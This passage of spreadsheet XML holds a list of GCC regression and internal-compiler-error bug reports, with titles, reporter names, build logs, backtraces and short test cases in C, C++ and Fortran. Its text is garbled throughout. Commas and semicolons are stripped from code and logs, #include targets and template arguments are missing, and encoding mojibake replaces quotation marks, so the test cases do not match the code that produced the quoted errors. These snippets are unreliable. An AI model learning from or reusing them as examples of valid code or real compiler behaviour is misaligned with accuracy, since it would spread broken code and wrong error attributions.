  |  ./gen-protos &gt;xsys-protos.hT
cc1: conversion from UTF-8 to UCS-4BE not supported by iconv</t>
  </si>
  <si>
    <t>GCC-50885</t>
  </si>
  <si>
    <t>[4.7 Regression] FAIL: gcc.dg/strlenopt-22.c (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.dg/strlenopt-22.c    -O2 -fdump-tree-strlen  -l
m   -o ./strlenopt-22.exe    (timeout = 300)
/usr/ccs/bin/ld: Unsatisfied symbols:
   stpcpy (first referenced in /var/tmp//ccNLFKRb.o) (code)
collect2: error: ld returned 1 exit status
compiler exited with status 1
output is:
/usr/ccs/bin/ld: Unsatisfied symbols:
   stpcpy (first referenced in /var/tmp//ccNLFKRb.o) (code)
collect2: error: ld returned 1 exit status
FAIL: gcc.dg/strlenopt-22.c (test for excess errors)
Excess errors:
/usr/ccs/bin/ld: Unsatisfied symbols:
   stpcpy (first referenced in /var/tmp//ccNLFKRb.o) (code)
WARNING: gcc.dg/strlenopt-22.c compilation failed to produce executable
PASS: gcc.dg/strlenopt-22.c scan-tree-dump-times strlen strlen \( 0
PASS: gcc.dg/strlenopt-22.c scan-tree-dump-times strlen memcpy \( 1
PASS: gcc.dg/strlenopt-22.c scan-tree-dump-times strlen strcpy \( 0
PASS: gcc.dg/strlenopt-22.c scan-tree-dump-times strlen strcat \( 0
PASS: gcc.dg/strlenopt-22.c scan-tree-dump-times strlen strchr \( 1
PASS: gcc.dg/strlenopt-22.c scan-tree-dump-times strlen stpcpy \( 1</t>
  </si>
  <si>
    <t>GCC-84003</t>
  </si>
  <si>
    <t>FAIL: g++.dg/torture/pr77745.C with noinline foo</t>
  </si>
  <si>
    <t>[hjl@gnu-skx-1 gcc]$ make check-c++ RUNTESTFLAGS=--target_board='unix{-m32\ -fpic}'  dg-torture.exp=pr77745.C
rm -rf testsuite/g++-parallel
make[1]: Entering directory '/export/build/gnu/gcc-test/build-x86_64-linux/gcc'
(rootme=`${PWDCMD-pwd}` export rootme \
srcdir=`cd /export/gnu/import/git/gcc/gcc ${PWDCMD-pwd}`  export srcdir  \
if [ -n  ] \
   &amp;&amp; [ -n $GCC_RUNTEST_PARALLELIZE_DIR ] \
    then \
  rm -rf testsuite/g++ \
else \
  cd testsuite/g++ \
  rm -f tmp-site.exp \
  sed '/set tmpdir/ s|testsuite$|testsuite/g++|' \
	 tmp-site.exp \
  /bin/sh ${srcdir}/../move-if-change tmp-site.exp site.exp \
  EXPECT=`if [ -f ${rootme}/../expect/expect ]  then echo ${rootme}/../expect/expect  else echo expect  fi`  export EXPECT  \
  if [ -f ${rootme}/../expect/expect ]  then  \
    TCL_LIBRARY=`cd ..  cd ${srcdir}/../tcl/library  ${PWDCMD-pwd}`  \
    export TCL_LIBRARY  \
  fi  \
  `if [ -f ${srcdir}/../dejagnu/runtest ]  then echo ${srcdir}/../dejagnu/runtest  else echo runtest fi` --tool g++ --target_board='unix{-m32\ -fpic}'  dg-torture.exp=pr77745.C \
  if [ -n $GCC_RUNTEST_PARALLELIZE_DIR ]  then \
    touch ${rootme}/testsuite/g++-parallel/finished \
  fi  \
fi )
WARNING: Couldn't find the global config file.
Test run by hjl on Tue Jan 23 11:38:39 2018
Native configuration is x86_64-pc-linux-gnu
		=== g++ tests ===
Schedule of variations:
    unix/-m32 -fpic
Running target unix/-m32 -fpic
Using /usr/share/dejagnu/baseboards/unix.exp as board description file for target.
Using /usr/share/dejagnu/config/unix.exp as generic interface file for target.
Using /export/gnu/import/git/gcc/gcc/testsuite/config/default.exp as tool-and-target-specific interface file.
Running /export/gnu/import/git/gcc/gcc/testsuite/g++.dg/torture/dg-torture.exp ...
FAIL: g++.dg/torture/pr77745.C   -O2  execution test
FAIL: g++.dg/torture/pr77745.C   -O3 -g  execution test
FAIL: g++.dg/torture/pr77745.C   -Os  execution test
FAIL: g++.dg/torture/pr77745.C   -O2 -flto -fno-use-linker-plugin -flto-partition=none  execution test
		=== g++ Summary ===
# of expected passes		10
# of unexpected failures	4
/export/build/gnu/gcc-test/build-x86_64-linux/gcc/xg++  version 8.0.1 20180123 (experimental) (GCC) 
make[1]: Leaving directory '/export/build/gnu/gcc-test/build-x86_64-linux/gcc'
[hjl@gnu-skx-1 gcc]$</t>
  </si>
  <si>
    <t>GCC-83148</t>
  </si>
  <si>
    <t>[8 regression] ICE: crash_signal from toplev.c:325</t>
  </si>
  <si>
    <t>The following example gives an ICE with the current 8.0 trunk but not with 7.2.1 or 6.4.1.
module fhypre
  use iso_c_binding only: c_ptr c_null_ptr
  use iso_c_binding only: hypre_obj =&gt; c_ptr hypre_null_obj =&gt; c_null_ptr
  private
  public :: hypre_obj hypre_null_obj
end module
module hypre_hybrid_type
  use fhypre
  type hypre_hybrid
    type(hypre_obj) :: solver = hypre_null_obj
  end type hypre_hybrid
end module
Here's the traceback
$ gfortran -c gfortran-20171124c.f90
f951: internal compiler error: Segmentation fault
0xd6b98f crash_signal
	../../gcc/toplev.c:325
0xfb33fd tree_class_check(tree_node const* tree_code_class char const* int char const*)
	../../gcc/tree.h:3480
0xfb33fd wi::from_mpz(tree_node const* __mpz_struct* bool)
	../../gcc/wide-int.cc:244
0x900284 gfc_conv_mpz_to_tree(__mpz_struct* int)
	../../gcc/fortran/trans-const.c:205
0x9008bf gfc_conv_constant(gfc_se* gfc_expr*)
	../../gcc/fortran/trans-const.c:413
0x922b91 gfc_conv_initializer(gfc_expr* gfc_typespec* tree_node* bool bool bool)
	../../gcc/fortran/trans-expr.c:6833
0x9231ad gfc_conv_structure(gfc_se* gfc_expr* int)
	../../gcc/fortran/trans-expr.c:7748
0x922cdf gfc_conv_initializer(gfc_expr* gfc_typespec* tree_node* bool bool bool)
	../../gcc/fortran/trans-expr.c:6883
0x90a78b gfc_get_symbol_decl(gfc_symbol*)
	../../gcc/fortran/trans-decl.c:1819
0x90d340 gfc_create_module_variable
	../../gcc/fortran/trans-decl.c:4943
0x8cf472 do_traverse_symtree
	../../gcc/fortran/symbol.c:4157
0x910193 gfc_generate_module_vars(gfc_namespace*)
	../../gcc/fortran/trans-decl.c:5415
0x8e88fc gfc_generate_module_code(gfc_namespace*)
	../../gcc/fortran/trans.c:2180
0x89cf7b translate_all_program_units
	../../gcc/fortran/parse.c:6078
0x89cf7b gfc_parse_file()
	../../gcc/fortran/parse.c:6294
0x8e0eaf gfc_be_parse_file
	../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-19743</t>
  </si>
  <si>
    <t>internal compiler error on errneous code</t>
  </si>
  <si>
    <t>Following invalid C function gives internal compiler error on x86_64 but not on
x86 on GCC 3.4.3 and 3.3.5:
char blabla(unsigned int a)
{
  return 
}
3.3.5 gives:
$ ./gcc -Wall -O2 -c /test/char.c
/test/char.c: In function `blabla':
/test/char.c:3: warning: return makes integer from pointer without a cast
/test/char.c:4: error: unrecognizable insn:
(insn 29 11 13 0 (nil) (set (reg:SI 0 eax [62])
        (subreg:SI (plus:DI (subreg:DI (reg:QI 7 spl) 0)
                (const_int -4 [0xfffffffffffffffc])) 0)) -1 (nil)
    (nil))
/test/char.c:4: internal compiler error: in extract_insn at recog.c:2175
$ ./gcc -v
Reading specs from /build/gcc/lib/gcc-lib/x86_64-unknown-linux-gnu/3.3.5/specs
Configured with: ./configure --enable-languages=c --prefix=/build/gcc
Thread model: posix
gcc version 3.3.5
3.4.3 gives:
$ ./gcc -Wall -O2 -c /test/char.c
/test/char.c: In function `blabla':
/test/char.c:3: warning: return makes integer from pointer without a cast
/test/char.c:4: error: unrecognizable insn:
(insn 30 11 13 0 (set (reg:SI 0 ax [62])
        (subreg:SI (plus:DI (subreg:DI (reg:QI 7 sp) 0)
                (const_int -4 [0xfffffffffffffffc])) 0)) -1 (nil)
    (nil))
/test/char.c:4: internal compiler error: in extract_insn at recog.c:2083
$ ./gcc -v
Reading specs from /build/gcc/lib/gcc/x86_64-unknown-linux-gnu/3.4.3/specs
Configured with: ./configure --enable-languages=c --prefix=/build/gcc
Thread model: posix
gcc version 3.4.3</t>
  </si>
  <si>
    <t>heikki.orsila</t>
  </si>
  <si>
    <t>GCC-19427</t>
  </si>
  <si>
    <t>[4.0 Regression] gcc.c-torture/execute/simd-1.c compilation fails for i686 with -msse</t>
  </si>
  <si>
    <t>This testsuite failure can be reproduced for both x86_64 and i686 with -msse2:
FAIL: gcc.c-torture/execute/simd-1.c compilation  -O0 
UNRESOLVED: gcc.c-torture/execute/simd-1.c execution  -O0 
FAIL: gcc.c-torture/execute/simd-1.c compilation  -O1 
UNRESOLVED: gcc.c-torture/execute/simd-1.c execution  -O1 
FAIL: gcc.c-torture/execute/simd-1.c compilation  -O2 
UNRESOLVED: gcc.c-torture/execute/simd-1.c execution  -O2 
FAIL: gcc.c-torture/execute/simd-1.c compilation  -O3 -fomit-frame-pointer 
UNRESOLVED: gcc.c-torture/execute/simd-1.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/simd-1.c compilation  -O3 -g 
UNRESOLVED: gcc.c-torture/execute/simd-1.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/simd-1.c compilation  -Os 
UNRESOLVED: gcc.c-torture/execute/simd-1.c execution  -Os 
simd-1.c:74: error: unrecognizable insn:
(insn 47 46 48 0 (set (reg:SI 78 [ D.1529 ])
        (vec_select:SI (reg:V4SI 154)
            (parallel [
                    (const_int 1 [0x1])
                ]))) -1 (nil)
    (expr_list:REG_DEAD (reg:V4SI 154)
        (nil)))
simd-1.c:74: internal compiler error: in extract_insn at recog.c:2020
However on i686 with -msse the error is different:
simd-1.c:74: error: unrecognizable insn:
(insn 24 23 25 0 (set (reg:V4SF 218)
        (vec_select:V4SF (vec_concat:V8SF (subreg:V4SF (reg:V4SI 207 [ i.0 ]) 0)
                (subreg:V4SF (reg:V4SI 207 [ i.0 ]) 0))
            (parallel [
                    (const_int 1 [0x1])
                    (const_int 1 [0x1])
                    (const_int 1 [0x1])
                    (const_int 1 [0x1])
                ]))) -1 (nil)
    (nil))
simd-1.c:74: internal compiler error: in extract_insn at recog.c:2020</t>
  </si>
  <si>
    <t>GCC-21577</t>
  </si>
  <si>
    <t>[3.4 Regression] libstdc++ testsuite broken</t>
  </si>
  <si>
    <t>Please see here for the details:
  http://gcc.gnu.org/ml/gcc/2005-05/msg00679.html
Essentially libstdc++ testsuite results are being lost because the
`libstdc++.log' is being overwritten by `check-abi'.
The regression is caused by this patch:
2005-05-12  Mark Mitchell  
        2005-04-04  Mark Mitchell  
        * testsuite/Makefile.am (check-local): Remove.
        (curent_symbols.txt): Likewise.
        (check-abi): Do not depend on current_symbols.txt.
        * testsuite/Makefile.in: Regenerated.
        * testsuite/libstdc++-abi/abi.exp: Build current_symbols.txt.
        2005-04-01  Mark Mitchell  
        * testsuite/Makefile.am (noinst_PROGRAMS): Remove.
        (site.exp): Write out the path to the baseline file.
        (check-abi): Use DejaGNU.
        (check-abi-verbose): Remove.
        * testsuite/Makefile.in: Regenerated.
        * testsuite/abi_check.cc (main): Check the return value from
        compare_symbols.
        * testsuite/testsuite_abi.cc (compare_symbols): Return a value.
        * testsuite/testsuite_abi.h (compare_symbols): Adjust prototype.
        * testsuite/libstdc++-abi/abi.exp: New file.
        2004-03-19  Phil Edwards  
        * testsuite/Makefile.am (site.exp):  New target based on that
        created by automake.  Also set libiconv.
I'm not sure what the right fix is. Will try to investigate.</t>
  </si>
  <si>
    <t>GCC-37319</t>
  </si>
  <si>
    <t>[4.4 regression] gfortran.dg/function_kinds_5.f90 fails</t>
  </si>
  <si>
    <t>Between revisions 139588 (working) and 139622 (broken) the test gfortran.dg/function_kinds_5.f90 started to fail: the expected error is no longer emitted:
[ibook-dhum] f90/bug% gfc -c /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/function_kinds_5.f90
[ibook-dhum] f90/bug% gfortran -c /opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/function_kinds_5.f90
/opt/gcc/_gcc_clean/gcc/testsuite/gfortran.dg/function_kinds_5.f90:8.6:
real (bad_kind(0d0)) function foo () ! { dg-error must be an intrinsic or }
     1
Error: Function 'bad_kind' in initialization expression at (1) must be an intrinsic or a specification function
where gfortran is 4.3.2.
I have reported it and other regressions which appeared at this time in comment #9 of pr37243.</t>
  </si>
  <si>
    <t>GCC-62258</t>
  </si>
  <si>
    <t>[4.9/5 Regression] uncaught_exception() equals to `true' after rethrow_exception()</t>
  </si>
  <si>
    <t>After using std::rethrow_exception() (and catching the exception) all subsequent calls to std::uncaught_exception() return `true' which is obviously not the way it was meant to work.
A simple test case is attached.</t>
  </si>
  <si>
    <t>dprokoptsev</t>
  </si>
  <si>
    <t>GCC-46508</t>
  </si>
  <si>
    <t>[4.6 regression] Add ARM VFP ABI support to libffi broke build for armv5tel-linux-gnueabi with binutils-2.20.1</t>
  </si>
  <si>
    <t>Attempting to build gcc-4.6-20101113 with --enable-languages=java (which enables libffi) for armv5tel-linux-gnueabi with binutils-2.20.1 fails due to the assembler complaining about VFP instructions in libffi's arm sysv.S:
&gt; /tmp/gcc-4.6-20101113/configure --target=armv5tel-unknown-linux-gnueabi --with-arch=armv5te --prefix=/home/mikpe/pkgs/linux-x86/cross-armv5tel --disable-nls --disable-shared --disable-libmudflap --disable-multilib --enable-threads=posix --enable-checking=release --enable-languages=cc++java
&gt; make
...
libtool: compile:  /tmp/objdir/./gcc/xgcc -B/tmp/objdir/./gcc/ -B/home/mikpe/pkgs/linux-x86/cross-armv5tel/armv5tel-unknown-linux-gnueabi/bin/ -B/home/mikpe/pkgs/linux-x86/cross-armv5tel/armv5tel-unknown-linux-gnueabi/lib/ -isystem /home/mikpe/pkgs/linux-x86/cross-armv5tel/armv5tel-unknown-linux-gnueabi/include -isystem /home/mikpe/pkgs/linux-x86/cross-armv5tel/armv5tel-unknown-linux-gnueabi/sys-include -DHAVE_CONFIG_H -I. -I/tmp/gcc-4.6-20101113/libffi -I. -I/tmp/gcc-4.6-20101113/libffi/include -Iinclude -I/tmp/gcc-4.6-20101113/libffi/src -I. -I/tmp/gcc-4.6-20101113/libffi/include -Iinclude -I/tmp/gcc-4.6-20101113/libffi/src -g -O2 -MT src/arm/sysv.lo -MD -MP -MF src/arm/.deps/sysv.Tpo -c /tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S -o src/arm/sysv.o
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S: Assembler messages:
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:266: Error: selected processor does not support `flddle d0[ip]'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:267: Error: selected processor does not support `fldmiadgt ip{d0-d7}'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:307: Error: selected processor does not support `fstseq s0[r2]'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:311: Error: selected processor does not support `fstdeq d0[r2]'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:316: Error: selected processor does not support `fstmiadeq r2{d0-d3}'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:400: Error: selected processor does not support `fstmfdd sp!{d0-d7}'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:438: Error: selected processor does not support `flds s0[sp]'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:441: Error: selected processor does not support `fldd d0[sp]'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:450: Error: selected processor does not support `fldmiad sp{d0-d1}'
/tmp/gcc-4.6-20101113/libffi/src/arm/sysv.S:453: Error: selected processor does not support `fldmiad sp{d0-d3}'
make[4]: *** [src/arm/sysv.lo] Error 1
make[4]: Leaving directory `/tmp/objdir/armv5tel-unknown-linux-gnueabi/libffi'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/tmp/objdir/armv5tel-unknown-linux-gnueabi/libffi'
make[2]: *** [all] Error 2
make[2]: Leaving directory `/tmp/objdir/armv5tel-unknown-linux-gnueabi/libffi'
make[1]: *** [all-target-libffi] Error 2
make[1]: Leaving directory `/tmp/objdir'
make: *** [all] Error 2
Notes:
1. If binutils is downgraded to 2.19.1 then gas no longer complains.
2. gcc-4.6-20101023 built Ok with the same configuration (a number of bootstrap-unbreaking patches were applied though). This error is a regression from r166032 Add ARM VFP ABI support to libffi:
http://gcc.gnu.org/ml/gcc-cvs/2010-10/msg01219.html
http://gcc.gnu.org/ml/gcc-patches/2010-10/msg02419.html</t>
  </si>
  <si>
    <t>GCC-61188</t>
  </si>
  <si>
    <t>[4.10 regression] Many -fcompare-debug failures</t>
  </si>
  <si>
    <t>Between 20140509 (r210264) and 20140513 (r210366) there occured many new testsuite
failures on Solaris 11/SPARC (both with as and gas) all of them -fcompare-debug
failures it seems e.g.
FAIL: gcc.dg/autopar/pr46066.c (test for excess errors)
% /var/gcc/regression/trunk/11-gcc/build/gcc/xgcc -B/var/gcc/regression/trunk/11-gcc/build/gcc/ /vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/autopar/pr46066.c -fno-diagnostics-show-caret -fdiagnostics-color=never -fcompare-debug -O -ftree-parallelize-loops=4 -S -o pr46066.s     
xgcc: error: /vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.dg/autopar/pr46066.c: -fcompare-debug failure (length)
The .gkd differences look like this:
--- pr46066.gkd 2014-05-14 14:56:34.164811700 +0200
+++ pr46066.gk.gkd      2014-05-14 14:56:34.320700300 +0200
@@ -317 +317 @@
             (const_int 0 [0]))) /vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.d
g/autopar/pr46066.c:10# {*cmpsi_insn}
      (nil))
 (insn 0 0 0 (sequence [
-            (jump_insn 33 # # (set (pc)
+            (jump_insn 35 # # (set (pc)
                     (if_then_else (le (reg:CC 100 %icc)
                             (const_int 0 [0]))
                         (label_ref:SI #)
@@ -397 +397 @@
                  (expr_list:REG_DEAD (reg:CC 100 %icc)
                     (int_list:REG_BR_PROB 900 (nil)))
              -&gt; 17)
-            (insn 38 # # (set (reg:SI 1 %g1 [156])
+            (insn 40 # # (set (reg:SI 1 %g1 [156])
                     (const_int 15360 [0x3c00]))# {*movsi_insn}
                  (expr_list:REG_EQUIV (const_int 15360 [0x3c00])
                     (nil)))
I'm attaching the full files.
I suspect that this is related to
2014-05-13  Richard Sandiford  
	* rtl.def (DEBUG_INSN INSN JUMP_INSN CALL_INSN JUMP_TABLE_DATA)
	(BARRIER CODE_LABEL NOTE): Remove first i field.
	* rtl.h (rtx_def): Add insn_uid to u2 field.
	(RTX_FLAG_CHECK8): Delete in favor of...
	(RTL_INSN_CHAIN_FLAG_CHECK): ...this new macro.
	(INSN_DELETED_P): Update accordingly.
	(INSN_UID): Use u2.insn_uid.
	(INSN_CHAIN_CODE_P): Define.
	(PREV_INSN NEXT_INSN BLOCK_FOR_INSN PATTERN INSN_LOCATION)
	(INSN_CODE REG_NOTES CALL_INSN_FUNCTION_USAGE CODE_LABEL_NUMBER)
	(NOTE_DATA NOTE_DELETED_LABEL_NAME NOTE_BLOCK NOTE_EH_HANDLER)
	(NOTE_BASIC_BLOCK NOTE_VAR_LOCATION NOTE_CFI NOTE_LABEL_NUMBER)
	(NOTE_KIND LABEL_NAME LABEL_NUSES JUMP_LABEL LABEL_REFS): Lower
	indices accordingly.
	* print-rtl.c (print_rtx): Print INSN_UIDs before the main loop.
	Update indices for insn-chain rtxes.
	* gengtype.c (gen_rtx_next): Adjust test for insn-chain rtxes.
	(adjust_field_rtx_def): Lower '0' indices for all insn-chain rtxes.
	* emit-rtl.c (gen_label_rtx): Update gen_rtx_LABEL call.
	* caller-save.c (init_caller_save): Update gen_rtx_INSN calls.
	* combine.c (try_combine): Likewise.
	* ira.c (setup_prohibited_mode_move_regs): Likewise.
  Rainer</t>
  </si>
  <si>
    <t>GCC-53067</t>
  </si>
  <si>
    <t>c++0x GCC 4.7.0 Regression std::ref with unordered sets</t>
  </si>
  <si>
    <t>Building the following code with gcc4.7 snapshot 20120421 fails but passed with gcc4.6.
$g++ -std=c++11
#include 
#include 
int main(int char**){
  std::unordered_map Foo
  ref(Foo)
}</t>
  </si>
  <si>
    <t>cmaloney</t>
  </si>
  <si>
    <t>GCC-32988</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE  in build2_stat at tree.c:3081</t>
  </si>
  <si>
    <t>gcc-4.3.0  Failing
gcc: warning: -pipe ignored because -save-temps specified
Using built-in specs.
Target: powerpc-unknown-linux-gnu
Configured with: ../gcc-4.3.0/configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --host=powerpc-unknown-linux-gnu --build=powerpc-unknown-linux-gnu --enable-__cxa_atexit --enable-threads=posix --enable-shared --enable-clocale=gnu --enable-bootstrap --enable-languages=cc++fortran --disable-altivec --disable-libssp --disable-decimal-float --disable-libmudflap --disable-nls --disable-werror --disable-multilib --with-ibmlongdouble --with-cpu=G4 --enable-clocale=gnu --with-system-zlib
Thread model: posix
gcc version 4.3.0 20070804 (experimental)
 /usr/libexec/gcc/powerpc-unknown-linux-gnu/4.3.0/cc1 -E -quiet -nostdinc -v -Iinclude -Iarch/powerpc -Iarch/powerpc/include -Iarch/powerpc -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=linux -Asystem=unix -Asystem=posix -D__KERNEL__ -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(page_alloc) -DKBUILD_MODNAME=KBUILD_STR(page_alloc) -isystem /usr/lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include -include include/linux/autoconf.h -MD mm/.page_alloc.o.d mm/page_alloc.c -m32 -msoft-float -mmultiple -mno-altivec -mno-string -mcpu=powerpc -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -Werror-implicit-function-declaration -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-aliasing -fno-common -ffixed-r2 -funit-at-a-time -fomit-frame-pointer -fno-stack-protector -O2 -fpch-preprocess -o page_alloc.i
ignoring duplicate directory arch/powerpc
#include ... search starts here:
#include  search starts here:
 include
 arch/powerpc
 arch/powerpc/include
 /usr/include/libffi
 /usr/lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include
End of search list.
 /usr/libexec/gcc/powerpc-unknown-linux-gnu/4.3.0/cc1 -fpreprocessed page_alloc.i -quiet -dumpbase page_alloc.c -m32 -msoft-float -mmultiple -mno-altivec -mno-string -mcpu=powerpc -auxbase-strip mm/page_alloc.o -O2 -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -Werror-implicit-function-declaration -Wdeclaration-after-statement -Wno-pointer-sign -version -fno-strict-aliasing -fno-common -ffixed-r2 -funit-at-a-time -fomit-frame-pointer -fno-stack-protector -o page_alloc.s
GNU C version 4.3.0 20070804 (experimental) (powerpc-unknown-linux-gnu)
	compiled by GNU C version 4.3.0 20070804 (experimental) GMP version 4.2.1 MPFR version 2.2.1-p5.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: 4442e4b24a55c66f044ee5a4a200c543
mm/page_alloc.c: In function 'free_area_init_nodes':
mm/page_alloc.c:3387: internal compiler error: in build2_stat at tree.c:3081
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gcc-4.2.2  OK
gcc: warning: -pipe ignored because -save-temps specified
Using built-in specs.
Target: powerpc-unknown-linux-gnu
Configured with: ../gcc-4.2.2/configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --host=powerpc-unknown-linux-gnu --build=powerpc-unknown-linux-gnu --enable-__cxa_atexit --enable-threads=posix --enable-altivec --enable-shared --enable-ffi --enable-clocale=gnu --enable-bootstrap --enable-libgcc-math --enable-languages=cc++ --disable-libunwind-exceptions --disable-nls --disable-werror --disable-multilib --with-ibmlongdouble --with-cpu=7450 --enable-clocale=gnu --with-system-zlib
Thread model: posix
gcc version 4.2.2 20070731 (prerelease)
 /usr/libexec/gcc/powerpc-unknown-linux-gnu/4.2.2/cc1 -E -quiet -nostdinc -v -Iinclude -Iarch/powerpc -Iarch/powerpc/include -Iarch/powerpc -D__unix__ -D__gnu_linux__ -D__linux__ -Dunix -D__unix -Dlinux -D__linux -Asystem=linux -Asystem=unix -Asystem=posix -D__KERNEL__ -DKBUILD_STR(s)=#s -DKBUILD_BASENAME=KBUILD_STR(page_alloc) -DKBUILD_MODNAME=KBUILD_STR(page_alloc) -isystem /usr/lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include -include include/linux/autoconf.h -MD mm/.page_alloc.o.d mm/page_alloc.c -m32 -msoft-float -mmultiple -mno-altivec -mno-string -mcpu=powerpc -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -Werror-implicit-function-declaration -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-aliasing -fno-common -ffixed-r2 -funit-at-a-time -fomit-frame-pointer -fno-stack-protector -O2 -fpch-preprocess -o page_alloc.i
ignoring duplicate directory arch/powerpc
#include ... search starts here:
#include  search starts here:
 include
 arch/powerpc
 arch/powerpc/include
 /usr/include/libffi
 /usr/lib/gcc/powerpc-unknown-linux-gnu/4.3.0/include
End of search list.
 /usr/libexec/gcc/powerpc-unknown-linux-gnu/4.2.2/cc1 -fpreprocessed page_alloc.i -quiet -dumpbase page_alloc.c -m32 -msoft-float -mmultiple -mno-altivec -mno-string -mcpu=powerpc -auxbase-strip mm/page_alloc.o -O2 -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -Werror-implicit-function-declaration -Wdeclaration-after-statement -Wno-pointer-sign -version -fno-strict-aliasing -fno-common -ffixed-r2 -funit-at-a-time -fomit-frame-pointer -fno-stack-protector -o page_alloc.s
GNU C version 4.2.2 20070731 (prerelease) (powerpc-unknown-linux-gnu)
	compiled by GNU C version 4.2.2 20070731 (prerelease).
GGC heuristics: --param ggc-min-expand=81 --param ggc-min-heapsize=96556
Compiler executable checksum: 3dcdab03fd037d389f4b01296a9801b5
 /usr/lib/gcc/powerpc-unknown-linux-gnu/4.2.2/../../../../powerpc-unknown-linux-gnu/bin/as -mppc -many -V -Qy -maltivec -o mm/page_alloc.o page_alloc.s
GNU assembler version 2.17.50.0.16 (powerpc-unknown-linux-gnu) using BFD version (Linux/GNU Binutils) 2.17.50.0.16.20070511</t>
  </si>
  <si>
    <t>michelin60</t>
  </si>
  <si>
    <t>GCC-30666</t>
  </si>
  <si>
    <t>[4.3 Regression] warning: canonical types differ for identical types double __complex__ and double __complex__</t>
  </si>
  <si>
    <t>Attached testcase (delta didn't reduce it any further) produces several warnings when compiled with -O2:
gcc -O2 -S render_1.ii
render_1.ii: In function Ã¢int pov::create_ray(pov::RAY* double double int)Ã¢:
render_1.ii:6494: warning: canonical types differ for identical types double __complex__ and double __complex__
 &lt;complex_type 0xb77a2b60
    type &lt;real_type 0xb7ce06e8 double sizes-gimplified type_6 DF
        size 
        unit size 
        align 64 symtab 0 alias set 2 canonical type 0xb7ce06e8 precision 64
        pointer_to_this  reference_to_this &gt;
    DC
    size  constant invariant 128&gt;
    unit size  constant invariant 16&gt;
    align 64 symtab 0 alias set -1 canonical type 0xb77a2b60&gt;
 &lt;complex_type 0xb7ce0d68 complex double
    type &lt;real_type 0xb7ce06e8 double sizes-gimplified type_6 DF
        size 
        unit size 
        align 64 symtab 0 alias set 2 canonical type 0xb7ce06e8 precision 64
        pointer_to_this  reference_to_this &gt;
    DC
    size  constant invariant 128&gt;
    unit size  constant invariant 16&gt;
    align 64 symtab 0 alias set -1 canonical type 0xb7ce0d68&gt;
render_1.ii:6494: warning: canonical types differ for identical types double __complex__ and double __complex__
 &lt;complex_type 0xb77a2b60
    type &lt;real_type 0xb7ce06e8 double sizes-gimplified type_6 DF
        size 
        unit size 
        align 64 symtab 0 alias set 2 canonical type 0xb7ce06e8 precision 64
        pointer_to_this  reference_to_this &gt;
    DC
    size  constant invariant 128&gt;
    unit size  constant invariant 16&gt;
    align 64 symtab 0 alias set -1 canonical type 0xb77a2b60&gt;
 &lt;complex_type 0xb7ce0d68 complex double
    type &lt;real_type 0xb7ce06e8 double sizes-gimplified type_6 DF
        size 
        unit size 
        align 64 symtab 0 alias set 2 canonical type 0xb7ce06e8 precision 64
        pointer_to_this  reference_to_this &gt;
    DC
    size  constant invariant 128&gt;
    unit size  constant invariant 16&gt;
    align 64 symtab 0 alias set -1 canonical type 0xb7ce0d68&gt;</t>
  </si>
  <si>
    <t>GCC-53837</t>
  </si>
  <si>
    <t>Unpacking variadic template parameters in a method parameter default value gives parse error</t>
  </si>
  <si>
    <t>-------- bug.cpp --------
template 
int f() { return 42 }
template 
struct B1 {
        B1(int i = f()) // ERROR
        void m(int i = f()) // ERROR
}
struct B2 {
        template 
        void m(int i = f()) // ERROR
}
template 
struct B3 {
        B3(int i = call_f()) // OK
        void m(int i = call_f()) // OK
        static int call_f() { return f() }
}
template 
void g(int i = f()) // OK
int main() {}
-------- bug.cpp --------
$ g++ -std=c++0x bug.cpp
bug.cpp:6:22: error: expected â€˜)â€™ before â€˜&gt;â€™ token
bug.cpp:6:19: error: expected â€˜â€™ at end of member declaration
bug.cpp:6:22: error: expected unqualified-id before â€˜&gt;â€™ token
bug.cpp:7:26: error: expected â€˜)â€™ before â€˜&gt;â€™ token
bug.cpp:7:23: error: expected â€˜â€™ at end of member declaration
bug.cpp:7:26: error: expected unqualified-id before â€˜&gt;â€™ token
bug.cpp:6:13: error: parse error in template argument list
bug.cpp:7:17: error: parse error in template argument list
bug.cpp:12:26: error: expected â€˜)â€™ before â€˜&gt;â€™ token
bug.cpp:12:26: error: expected initializer before â€˜&gt;â€™ token
